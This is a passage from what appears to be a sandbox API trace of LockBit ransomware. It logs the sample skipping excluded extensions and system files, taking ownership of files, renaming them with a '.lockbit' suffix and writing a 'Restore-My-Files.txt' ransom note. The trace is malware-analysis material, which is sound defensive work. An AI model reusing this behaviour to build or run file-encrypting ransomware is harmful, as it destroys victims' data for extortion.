lpString2=".wmv") returned -1 [0079.915] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0079.915] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0079.915] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0079.915] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.915] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0079.915] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0079.915] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0079.915] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0079.915] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="flower_trans_RGB_PAL.wmv") returned 1 [0079.915] lstrcmpiW (lpString1="ntldr", lpString2="flower_trans_RGB_PAL.wmv") returned 1 [0079.915] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="flower_trans_RGB_PAL.wmv") returned 1 [0079.915] lstrcmpiW (lpString1="bootsect.bak", lpString2="flower_trans_RGB_PAL.wmv") returned -1 [0079.915] lstrcmpiW (lpString1="autorun.inf", lpString2="flower_trans_RGB_PAL.wmv") returned -1 [0079.915] lstrcmpiW (lpString1="thumbs.db", lpString2="flower_trans_RGB_PAL.wmv") returned 1 [0079.915] lstrcmpiW (lpString1="iconcache.db", lpString2="flower_trans_RGB_PAL.wmv") returned 1 [0079.915] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\") returned="" [0079.916] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv") returned=".wmv" [0079.916] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0079.916] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0079.916] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0079.916] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0079.916] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0079.916] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0079.916] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0079.916] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0079.916] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0079.916] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0079.916] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0079.916] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0079.916] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0079.916] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0079.916] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0079.916] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0079.916] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0079.916] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0079.916] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0079.916] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0079.916] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0079.916] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0079.916] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0079.916] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0079.917] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0079.917] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0079.917] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0079.917] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0079.917] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv.lockbit") returned 86 [0079.917] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_rgb_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.917] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.918] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.918] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.918] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.918] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.918] RtlFreeAnsiString (AnsiString="\\") [0079.918] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0079.918] malloc (_Size=0x200) returned 0x77d800 [0079.918] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.918] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.919] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.919] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.919] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.919] CloseHandle (hObject=0x3c4) returned 1 [0079.919] free (_Block=0x77d800) [0079.919] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_rgb_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0079.920] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.920] malloc (_Size=0x40068) returned 0x1fb18c0 [0079.920] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=237208) returned 1 [0079.920] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.920] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.920] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0079.920] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.921] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0079.921] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0079.927] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.937] malloc (_Size=0xc2) returned 0x1ff1e60 [0079.937] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xc2, FileInformationClass=0xa) returned 0xc0000008 [0079.937] free (_Block=0x1ff1e60) [0079.937] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 1 [0079.937] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt") returned 74 [0079.937] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.937] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72a94088, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72a94088, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b5c4549, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x609, dwReserved0=0x0, dwReserved1=0x0, cFileName="highlight.png", cAlternateFileName="")) returned 1 [0079.937] lstrcmpiW (lpString1=".", lpString2="highlight.png") returned -1 [0079.937] lstrcmpiW (lpString1="..", lpString2="highlight.png") returned -1 [0079.937] PathFindExtensionW (pszPath="highlight.png") returned=".png" [0079.937] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0079.937] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0079.937] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0079.937] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0079.937] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0079.937] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0079.937] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0079.937] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0079.937] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0079.937] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0079.937] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0079.937] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0079.937] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0079.937] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0079.938] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0079.938] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0079.938] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0079.938] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0079.938] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0079.938] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0079.938] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0079.938] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0079.938] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0079.938] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0079.938] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.938] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0079.938] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0079.938] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0079.938] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0079.938] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0079.938] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0079.938] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0079.938] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0079.938] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0079.938] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0079.938] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0079.938] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0079.938] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0079.938] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0079.938] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0079.938] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0079.938] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0079.938] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.938] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0079.939] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0079.939] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0079.939] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0079.939] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="highlight.png") returned 1 [0079.939] lstrcmpiW (lpString1="ntldr", lpString2="highlight.png") returned 1 [0079.939] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="highlight.png") returned 1 [0079.939] lstrcmpiW (lpString1="bootsect.bak", lpString2="highlight.png") returned -1 [0079.939] lstrcmpiW (lpString1="autorun.inf", lpString2="highlight.png") returned -1 [0079.939] lstrcmpiW (lpString1="thumbs.db", lpString2="highlight.png") returned 1 [0079.939] lstrcmpiW (lpString1="iconcache.db", lpString2="highlight.png") returned 1 [0079.939] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\") returned="" [0079.939] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png") returned=".png" [0079.939] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0079.939] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0079.939] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0079.939] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0079.939] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0079.939] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0079.939] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0079.939] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0079.939] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0079.939] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0079.939] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0079.939] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0079.939] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0079.939] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0079.939] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0079.939] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0079.939] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0079.939] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0079.939] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0079.940] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0079.940] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0079.940] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0079.940] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0079.940] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0079.940] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0079.940] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0079.940] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0079.940] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0079.940] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png.lockbit") returned 75 [0079.940] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\highlight.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.940] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.941] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.941] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.941] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.941] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.941] RtlFreeAnsiString (AnsiString="\\") [0079.941] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0079.941] malloc (_Size=0x200) returned 0x77d800 [0079.941] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.941] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.942] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.942] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.942] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.942] CloseHandle (hObject=0x3c4) returned 1 [0079.942] free (_Block=0x77d800) [0079.942] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\highlight.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0079.942] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.942] malloc (_Size=0x40068) returned 0x1fb18c0 [0079.942] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=1545) returned 1 [0079.943] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.943] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0079.943] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.943] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0079.943] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0079.949] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.949] malloc (_Size=0xac) returned 0x1ff1e60 [0079.949] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xac, FileInformationClass=0xa) returned 0xc0000008 [0079.949] free (_Block=0x1ff1e60) [0079.949] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 1 [0079.949] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt") returned 74 [0079.949] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.949] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72aba1e5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72aba1e5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b5ea6a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x239b, dwReserved0=0x0, dwReserved1=0x0, cFileName="mainimage-mask.png", cAlternateFileName="")) returned 1 [0079.949] lstrcmpiW (lpString1=".", lpString2="mainimage-mask.png") returned -1 [0079.949] lstrcmpiW (lpString1="..", lpString2="mainimage-mask.png") returned -1 [0079.949] PathFindExtensionW (pszPath="mainimage-mask.png") returned=".png" [0079.949] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0079.950] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0079.950] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0079.950] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0079.950] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0079.950] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0079.950] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0079.950] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0079.950] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0079.950] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0079.950] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0079.950] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0079.950] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0079.950] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0079.950] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0079.950] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0079.950] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0079.950] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0079.950] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0079.950] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0079.950] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0079.950] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0079.950] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0079.950] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0079.950] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.950] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0079.950] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0079.950] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0079.950] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0079.950] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0079.950] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0079.950] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0079.950] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0079.951] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0079.951] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0079.951] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0079.951] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0079.951] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0079.951] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0079.951] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0079.951] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0079.951] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0079.951] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.951] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0079.951] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0079.951] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0079.951] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0079.951] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="mainimage-mask.png") returned 1 [0079.951] lstrcmpiW (lpString1="ntldr", lpString2="mainimage-mask.png") returned 1 [0079.951] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="mainimage-mask.png") returned 1 [0079.951] lstrcmpiW (lpString1="bootsect.bak", lpString2="mainimage-mask.png") returned -1 [0079.951] lstrcmpiW (lpString1="autorun.inf", lpString2="mainimage-mask.png") returned -1 [0079.951] lstrcmpiW (lpString1="thumbs.db", lpString2="mainimage-mask.png") returned 1 [0079.951] lstrcmpiW (lpString1="iconcache.db", lpString2="mainimage-mask.png") returned -1 [0079.951] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\") returned="" [0079.951] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png") returned=".png" [0079.951] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0079.951] lstrcmpiW (lpString1=".zip", 